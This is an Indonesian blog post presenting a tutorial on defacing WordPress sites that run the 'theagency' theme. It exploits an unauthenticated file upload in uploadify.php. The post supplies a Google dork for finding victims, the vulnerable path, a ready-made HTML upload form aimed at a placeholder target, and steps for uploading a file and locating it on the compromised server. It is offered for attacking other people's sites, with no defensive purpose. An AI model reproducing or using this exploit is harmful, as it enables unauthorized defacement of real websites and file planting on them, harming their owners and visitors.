Selasa, 28 Februari 2017

Deface Wordpress Theme Theagency File Upload




Assalamualaikum gan
Gimana Kabarnya :)
Kali Ini Saya Akan Share Tentang Cara Deface Wordpress Theme Theagency File UplaodLangsung Saja Yha

 =>Dork.
      inurl:/wp-content/themes/theagency

=>Exploit.
      /wp-content/themes/theagency/includes/uploadify/uploadify.php

=>CSRF.
<form action="http://targetnya.com/wp-content/themes/theagency/includes/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="SIKAT!">
</form>

Langkah - Langkah:

1.Dorking Ke Mbah Google


2. Pilih Salah Satu Site,Cari Yang Vuln Yha Gan
        
    Contoh: 
    http://targetnya.com

   Masukkan Eksploitnya Menjadi 
   http://targetnya.com/wp-content/themes/theagency/includes/uploadify/uploadify.php

Kalau Vuln Tampilan Webnya=blank/Kosong




 Copy Csrf Di Atas, Masukkan Site Ke Csrf, Save dengan format html. Kalau Sudah Buka File Csrf Kamu,terus Upload Deh ..



Kalau file nya suksek ke upload bakal muncul angka 1,Kalau Sudah Kita Cari Letak Filenya
Contoh
 http://targetnya.com/wp-content/themes/theagency/includes/uploadify/uploads/namafileagan


Dan Hasilnya.., Tergantung Agan Mau Ngupload Foto/file . Kalau Belum Jelas Komen Aja Gan No PHP kok










Load disqus comments

0 komentar

Comments
0 Comments